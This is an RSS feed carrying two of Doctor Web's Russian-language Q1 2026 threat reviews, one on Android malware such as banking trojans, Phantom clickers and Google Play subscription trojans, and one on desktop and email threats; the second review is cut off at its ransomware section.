<?xml version="1.0"?>
<rss version="2.0"><channel><title>Все новости</title><link>https://news.drweb.kz/news/</link><description>Новости компании "Доктор Веб" - Все новости</description><image><url>https://st.drweb.com/static/drweb_logo_kk.gif</url><link>https://news.drweb.kz/news/</link><title>Антивирус Dr.Web</title></image><item><guid>https://news.drweb.kz/show/?i=15136&amp;lng=kk</guid><title>«Доктор Веб»: обзор вирусной активности для мобильных устройств в I квартале 2026 года</title><link>https://news.drweb.kz/show/?i=15136&amp;lng=kk&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 апреля 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Согласно данным статистики детектирований Dr.Web Security Space для мобильных устройств, в I квартале 2026 года продолжилось снижение активности вредоносных программ &lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, демонстрирующих надоедливую рекламу. Первые обнаруживались на защищаемых устройствах на 32,70%, а вторые — на 7,09% реже по сравнению с IV кварталом минувшего года. Они уступили лидерство банковским троянам семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.Banker&amp;lng=kk"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, активность которых за последние 3 месяца увеличилась более чем в 2,5 раза. В результате те стали самыми распространенными Android-угрозами. Такие вредоносные приложения перехватывают СМС с кодами подтверждения банковских операций, демонстрируют фишинговые окна, а также могут имитировать внешний вид настоящего банковского ПО для кражи конфиденциальных данных. Пользователи чаще всего сталкивались с троянами подсемейства &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, куда входят разнообразные вредоносные программы.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Широкое распространение (15,35% от общего числа детектирований) в I квартале получили приложения, в которые при помощи хакерских инструментов для моддинга NP Manager добавлен мусорный код с целью запутывания логики. C осени прошлого года эти инструменты активно используются в троянах семейства &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; для противодействия обнаружению антивирусами, поэтому мы предупреждаем о том, что то или иное приложение было модифицировано. Подобные программы антивирусные продукты Dr.Web детектируют как &lt;a href="https://vms.drweb.kz/search/?q=Tool.Obfuscator.TrashCode&amp;lng=kk"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Другим распространенным потенциально опасным ПО, несмотря на снижение числа детектирований на 31,65%, вновь стали программы, модифицированные при помощи утилиты NP Manager (детектируются Dr.Web как &lt;a href="https://vms.drweb.kz/search/?q=Tool.NPMod&amp;lng=kk"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;). Данная утилита содержит различные модули для защиты и обфускации кода программ, а также обхода проверки их цифровой подписи после модификации. Киберпреступники используют ее для защиты вредоносного ПО с целью затруднить его обнаружение антивирусами.&lt;/p&gt;

&lt;p&gt;Самыми распространенными нежелательными приложениями стали поддельные антивирусы &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeAntiVirus&amp;lng=kk"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, которые якобы обнаруживают угрозы и для их «лечения» требуют приобрести полную версию. Кроме того, пользователи вновь сталкивались с программами из семейств &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;. Первые якобы позволяют зарабатывать на выполнении различных заданий. Вторые представляют собой ПО, модифицированное через облачный сервис CloudInject. С его помощью в приложения добавляются опасные системные разрешения и обфусцированный код, функциональность которого невозможно проконтролировать.&lt;/p&gt;

&lt;p&gt;Среди рекламного ПО лидерами по числу детектирований стали программы-оптимизаторы &lt;a href="https://vms.drweb.kz/search/?q=Adware.Bastion&amp;lng=kk"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Они периодически создают уведомления с вводящими в заблуждение сообщениями о якобы нехватке памяти и ошибках системы. Их целью является демонстрация рекламы во время «оптимизации». Другим популярным рекламным ПО были приложения &lt;b&gt;Adware.Opensite.15&lt;/b&gt;, которые злоумышленники выдают за чит-инструменты для получения ресурсов в играх. На самом деле такие программы загружают различные сайты с объявлениями. Распространение вновь получили и программы со встроенными рекламными модулями &lt;a href="https://vms.drweb.kz/search/?q=Adware.AdPush&amp;lng=kk"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;В январе компания «Доктор Веб» &lt;a href="https://news.drweb.kz/show/?i=15110" target="_blank"&gt;проинформировала&lt;/a&gt; пользователей об &lt;b&gt;Android.Phantom&lt;/b&gt; — новом семействе троянских приложений-кликеров. Наши вирусные аналитики выявили несколько источников распространения этих вредоносных программ. Среди них — официальный каталог приложений для устройств Xiaomi GetApps, где трояны были внедрены в ряд игр. Кроме того, киберпреступники распространяли кликеры вместе с модами популярных приложений через различные Telegram-каналы, серверы Discord, онлайн-сборники ПО и вредоносные сайты.&lt;/p&gt;

&lt;p&gt;С помощью &lt;b&gt;Android.Phantom&lt;/b&gt; злоумышленники накручивают рекламные клики на веб-сайтах, применяя для этого технологии машинного обучения и WebRTC — технологию передачи потоковых данных (в том числе видео) через браузер. Трояны загружают в невидимом WebView целевые интернет-ресурсы вместе с JavaScript-кодом для симуляции действий пользователя. Взаимодействие с объявлениями происходит в одном из двух режимов. Если на устройстве возможно использование WebRTC, кликеры &lt;b&gt;Android.Phantom&lt;/b&gt; транслируют злоумышленникам виртуальный экран с загруженным сайтом, и те управляют им вручную или с использованием автоматизированной системы.&lt;/p&gt;

&lt;p&gt;Если WebRTC недоступен, применяются автоматизированные сценарии на языке JavaScript, которые используют фреймворк TensorFlowJS. Кликеры скачивают с удаленного сервера необходимую поведенческую модель, а также JavaScript, содержащий сам фреймворк и все необходимые функции для работы модели и взаимодействия с целевыми сайтами.&lt;/p&gt;

&lt;p&gt;В течение I квартала антивирусная лаборатория компании «Доктор Веб» зафиксировала появление новых угроз в каталоге Google Play. Среди них — множество троянских приложений &lt;a href="https://vms.drweb.kz/search/?q=Android.Joker&amp;lng=kk"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, а также вредоносные программы &lt;a href="https://vms.drweb.kz/search/?q=Android.Subscription&amp;lng=kk"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.Subscription&amp;lng=kk"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;. Все они созданы для подписки пользователей на платные услуги.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции I квартала&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Банковские трояны &lt;a href="https://vms.drweb.kz/search/?q=Android.Banker&amp;lng=kk"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; стали самыми распространенными Android-угрозами&lt;/li&gt;
        &lt;li&gt;Злоумышленники стали чаще использовать инструменты для моддинга Android-программ с целью защиты банковских троянов&lt;/li&gt;
        &lt;li&gt;Продолжилось снижение активности рекламных троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Распространение троянских приложений &lt;b&gt;Android.Phantom&lt;/b&gt;, которые используют машинное обучение и видеотрансляции для накрутки кликов на веб-сайтах&lt;/li&gt;
        &lt;li&gt;Обнаружены новые вредоносные приложения в каталоге Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным Dr.Web Security Space для мобильных устройств&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Банковский троян, который перехватывает СМС с одноразовыми кодами от кредитных организаций, содержимое уведомлений, а также собирает другую конфиденциальную информацию. Она включает технические данные о зараженном устройстве, список установленных приложений, информацию о СИМ-карте, телефонных звонках, поступивших и отправленных СМС.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа для показа навязчивой рекламы. Представители семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; часто распространяются под видом безобидных приложений и, в некоторых случаях, устанавливаются в системный каталог другим вредоносным ПО. Попадая на Android-устройства, такие рекламные трояны обычно скрывают от пользователя свое присутствие в системе — например, «прячут» значок приложения из меню главного экрана.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование обфускатора, который в том числе используется для защиты вредоносных приложений (например, некоторых версий банковских троянов &lt;b&gt;Android.SpyMax&lt;/b&gt;).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Click&amp;lng=kk"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.FakeAntiVirus&amp;lng=kk"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно вывести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как &lt;a href="https://vms.drweb.kz/search/?q=Tool.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими: блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение устройства и выполнять аудиозапись окружения.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.Obfuscator.TrashCode&amp;lng=kk"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.Obfuscator.TrashCode&amp;lng=kk"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-программ, в которые при помощи хакерских инструментов для моддинга приложений добавлен мусорный код. Такая модификация выполняется с целью запутывания логики программ. Эта техника часто встречается в банковских троянах и в пиратских версиях ПО.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. Эта утилита содержит модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Добавляемая ей обфускация часто используется во вредоносном ПО для затруднения его детектирования и анализа.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.LuckyPatcher&amp;lng=kk"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.Bastion&amp;lng=kk"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование программ-оптимизаторов, которые периодически создают уведомления с вводящими в заблуждение сообщениями якобы о нехватке памяти и ошибках системы с целью показывать рекламу во время «оптимизации».&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.AdPush&amp;lng=kk"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламный модуль, который может быть интегрирован в Android-программы. Он демонстрирует рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, этот модуль собирает ряд конфиденциальных данных, а также способен загружать другие приложения и инициировать их установку.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Приложения, выдаваемые за чит-инструменты для получения ресурсов в играх. На самом деле они созданы для демонстрации рекламы. Эти программы получают с удаленного сервера конфигурацию, в соответствии с которой загружают целевой сайт с объявлениями — баннерами, всплывающими окнами, видеороликами и т. д.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.Fictus&amp;lng=kk"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламный модуль, который злоумышленники встраивают в версии-клоны популярных Android-игр и программ. Его интеграция в программы происходит при помощи специализированного упаковщика net2share. Созданные таким образом копии ПО распространяются через различные каталоги приложений, и после установки демонстрируют нежелательную рекламу.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Угрозы в Google Play&lt;/h3&gt;

&lt;p&gt;В I квартале 2026 года специалисты антивирусной лаборатории «Доктор Веб» выявили в каталоге Google Play очередные вредоносные приложения &lt;a href="https://vms.drweb.kz/search/?q=Android.Joker&amp;lng=kk"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, которые подписывают жертв на платные услуги. Трояны скрывались в ряде утилит для оптимизации работы Android-устройств, а также распространялись под видом мессенджеров, мультимедийного и другого ПО. Суммарно пользователи установили их, по меньшей мере, 370 000 раз.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.1.jpg"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.1.jpg"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Примеры вредоносных программ &lt;b&gt;Android.Joker&lt;/b&gt;, выявленных в Google Play в I квартале 2026 года. &lt;b&gt;Android.Joker.2511&lt;/b&gt; был встроен в мессенджер Private Chat Message, а &lt;b&gt;Android.Joker.2524&lt;/b&gt; — в программу-фотокамеру Magic Camera&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Кроме того, наши вирусные аналитики обнаружили вредоносные программы &lt;a href="https://vms.drweb.kz/search/?q=Android.Subscription&amp;lng=kk"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.Subscription&amp;lng=kk"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;, также предназначенные для подключения пользователей к платным сервисам. Трояны загружают веб-сайты, на которых при помощи технологии Wap Click активируются платные мобильные подписки. На этих сайтах у пользователей запрашивается номер мобильного телефона, после чего происходит попытка автоматического подключения услуги. Оба вредоносных приложения суммарно были загружены из каталога Google Play свыше 1 500 000 раз.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Вредоносные программы &lt;b&gt;Android.Subscription.23&lt;/b&gt; и &lt;b&gt;Android.Subscription.24&lt;/b&gt; распространялись под видом приложений Stream Hive и Prime Link для управления личными финансами, однако их единственной функциональностью была загрузка сайтов для подключения владельцев Android-устройств к платным мобильным сервисам&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15135&amp;lng=kk</guid><title>«Доктор Веб»: обзор вирусной активности в I квартале 2026 года</title><link>https://news.drweb.kz/show/?i=15135&amp;lng=kk&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 апреля 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Согласно статистике детектирований антивируса Dr.Web, в I квартале 2026 года общее число обнаруженных угроз снизилось на 6,77% по сравнению с IV кварталом прошлого года. Число уникальных угроз уменьшилось на 11,98%. Чаще всего на защищаемых устройствах обнаруживалось рекламное ПО и рекламные трояны, вредоносные программы-загрузчики, а также бэкдоры.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;В почтовом трафике наиболее часто встречались вредоносные скрипты, бэкдоры и различные троянские приложения. Через электронные письма злоумышленники также распространяли фишинговые документы и эксплойты.&lt;/p&gt;

&lt;p&gt;Пользователи, чьи файлы были затронуты троянами-шифровальщиками, чаще всего сталкивались с энкодерами &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; и &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;В I квартале 2026 года интернет-аналитики компании «Доктор Веб» выявили новые фишинговые сайты, включая поддельные ресурсы кредитных организаций и маркетплейсов, а также ряд других нежелательных сайтов.&lt;/p&gt;

&lt;p&gt;В сегменте мобильных устройств наблюдалась возросшая активность банковских троянов. При этом наши вирусные аналитики отметили рост популярности методики защиты вредоносных программ от обнаружения антивирусным ПО, которая заключается в добавлении в них мусорного кода. &lt;/p&gt;

&lt;p&gt;В январе эксперты «Доктор Веб» рассказали о троянах-кликерах &lt;b&gt;Android.Phantom&lt;/b&gt;, которые используют машинное обучение и видеотрансляции для накрутки кликов на веб-сайтах. Кроме того, в течение последних 3 месяцев мы зафиксировали появление очередных вредоносных программ в каталоге Google Play, среди которых были трояны, подписывающие пользователей на платные услуги. &lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции I квартала&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Снизилось число угроз, обнаруженных на защищаемых устройствах&lt;/li&gt;
        &lt;li&gt;Среди детектируемых угроз сократилось число уникальных файлов&lt;/li&gt;
        &lt;li&gt;По сравнению с прошлым периодом наблюдения было зафиксировано меньше запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками&lt;/li&gt;
        &lt;li&gt;Продолжился рост активности банковских троянов для Android-устройств&lt;/li&gt;
        &lt;li&gt;Пользователям угрожали вредоносные программы-кликеры &lt;b&gt;Android.Phantom&lt;/b&gt;, которые используют, в том числе, технологии машинного обучения для накрутки кликов на веб-сайтах&lt;/li&gt;
        &lt;li&gt;В каталоге Google Play были выявлены очередные вредоносные программы&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным сервиса статистики «Доктор Веб»&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы I квартала 2026 года&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Adware.Downware.20655&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Рекламное ПО, выступающее в роли промежуточного установщика пиратских программ.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.&lt;/dd&gt;
    &lt;dt&gt;Adware.Siggen.33379&lt;/dt&gt;
    &lt;dd&gt;Поддельный браузерный блокировщик рекламы Adblock Plus, который устанавливается в систему другими вредоносными приложениями с целью показа рекламы.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Статистика вредоносных программ в почтовом трафике&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы I квартала 2026 года в почтовом трафике&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;JS.DownLoader.1225&lt;/dt&gt;
    &lt;dd&gt;Эвристическое детектирование для ZIP-архивов, содержащих скрипты JavaScript с подозрительными именами.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.&lt;/dd&gt;
    &lt;dt&gt;JS.Redirector.514&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт, перенаправляющий пользователя на подконтрольную злоумышленникам веб-страницу.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Шифровальщики&lt;/h3&gt;

